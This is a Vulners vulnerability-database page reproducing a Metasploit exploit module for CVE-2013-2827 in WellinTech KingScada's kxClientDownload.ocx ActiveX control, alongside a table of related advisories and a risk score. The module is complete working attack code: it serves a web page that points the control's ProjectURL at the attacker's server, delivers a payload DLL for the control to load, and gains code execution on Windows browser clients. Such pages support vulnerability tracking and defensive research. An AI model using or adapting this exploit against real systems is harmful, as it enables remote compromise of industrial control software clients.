Vulners
Lucene search
KingScada - kxClientDownload.ocx ActiveX Remote Code Execution (Metasploit)
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | KingScada kxClientDownload.ocx ActiveX Remote Code Execution | 11 Feb 201400:00 | – | zdt |
 | CVE-2013-2827 | 11 Feb 201400:00 | – | circl |
 | WellinTech Multiple Products kxClientDownload ActiveX Remote Code Execution (CVE-2013-2827) | 13 Mar 201400:00 | – | checkpoint_advisories |
 | CVE-2013-2827 | 15 Jan 201416:00 | – | cve |
 | CVE-2013-2827 | 15 Jan 201416:00 | – | cvelist |
 | WellinTech Vulnerabilities | 12 Sep 201306:00 | – | ics |
 | KingScada kxClientDownload.ocx ActiveX Remote Code Execution | 7 Feb 201400:25 | – | metasploit |
 | CVE-2013-2827 | 15 Jan 201416:08 | – | nvd |
 | KingScada kxClientDownload.ocx ActiveX Remote Code Execution | 11 Feb 201400:00 | – | packetstorm |
 | Code injection | 15 Jan 201416:08 | – | prion |
10
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'KingScada kxClientDownload.ocx ActiveX Remote Code Execution',
'Description' => %q{
This module abuses the kxClientDownload.ocx ActiveX control distributed with WellingTech KingScada.
The ProjectURL property can be abused to download and load arbitrary DLLs from
arbitrary locations, leading to arbitrary code execution, because of a dangerous
usage of LoadLibrary. Due to the nature of the vulnerability, this module will work
only when Protected Mode is not present or not enabled.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Andrea Micalizzi', # aka rgod original discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2013-2827'],
['OSVDB', '102135'],
['BID', '64941'],
['ZDI', '14-011'],
['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01']
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
},
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => /MSIE|KXCLIE/i
},
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500,
'DisableNopes' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 14 2014'))
end
def on_request_exploit(cli, request, target_info)
print_status("Requested: #{request.uri}")
if request.uri =~ /\/libs\/.*\.dll/
print_good("Sending DLL payload")
send_response(cli,
generate_payload_dll(:code => get_payload(cli, target_info)),
'Content-Type' => 'application/octet-stream'
)
return
elsif request.uri =~ /\/libs\//
print_status("Sending not found")
send_not_found(cli)
return
end
content = <<-EOS
<html>
<body>
<object classid='clsid:1A90B808-6EEF-40FF-A94C-D7C43C847A9F' id='#{rand_text_alpha(10 + rand(10))}'>
<param name="ProjectURL" value="#{get_module_uri}"></param>
</object>
</body>
</html>
EOS
print_status("Sending #{self.name}")
send_response_html(cli, content)
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Feb 2014 00:00Current
7High risk
Vulners AI Score7
CVSS 27.5
EPSS0.60519